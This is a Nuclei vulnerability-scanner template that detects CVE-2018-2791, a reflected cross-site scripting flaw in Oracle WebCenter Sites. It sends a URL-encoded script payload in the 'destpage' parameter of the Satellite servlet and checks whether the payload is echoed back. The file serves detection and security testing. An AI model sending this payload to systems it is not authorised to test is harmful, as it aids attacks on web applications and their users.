nuclei-templates/cves/2018/CVE-2018-2791.yaml

25 lines
631 B
YAML

id: CVE-2018-2791
info:
name: Oracle WebCenter Sites XSS
author: madrobot
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
tags: cve,cve2018,oracle,xss
requests:
- method: GET
path:
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
matchers-condition: and
matchers:
- type: word
words:
- "<h1xxx<scriptalert(1)</script"
part: body
- type: word
words:
- "text/html"
part: header